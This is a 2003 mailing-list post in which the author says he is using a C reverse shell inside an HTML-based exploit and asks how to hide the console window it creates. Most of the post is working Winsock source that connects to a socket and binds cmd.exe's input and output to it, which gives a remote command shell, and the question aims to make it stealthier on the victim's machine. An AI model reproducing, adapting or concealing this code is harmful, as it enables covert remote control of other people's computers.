freeconsole()

From: Mike Mires (poc_sploitat_private)
Date: Wed Feb 26 2003 - 02:25:36 PST


    Hi all,
    
    I am using a basic reverse shell written in C as part of an HTML-based 
    exploit recently revealed by malware.com. It uses WSAStartup() and 
    CreateProcess(). I'm looking for a way to hide the console created by 
    CreateProcess. I've tried freeconsole() with no params as suggested by some 
    sources; however, this does not work.
    
    Any ideas would be appreciated.
    
    Thanks
    
    P.S. The code I'm using is:
    
    
    #include <winsock2.h>
    #include <stdio.h>
    #include <windows.h>
    #pragma comment(lib,"ws2_32")
    
    void main(int argc, char *argv[])
    {
    //      FreeConsole();
    
            WSADATA wsaData;
            SOCKET hSocket;
            STARTUPINFO si;
            PROCESS_INFORMATION pi;
    
            struct sockaddr_in adik_sin;
            memset(&adik_sin,0,sizeof(adik_sin));
            memset(&si,0,sizeof(si));
            WSAStartup(MAKEWORD(2,0),&wsaData);
            hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
            adik_sin.sin_family = AF_INET;
            adik_sin.sin_port = htons(55);
            adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
            connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
            si.cb = sizeof(si);
            si.dwFlags = STARTF_USESTDHANDLES;
            si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
    
            CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
    
            ExitProcess(0);
    }
    
    
    


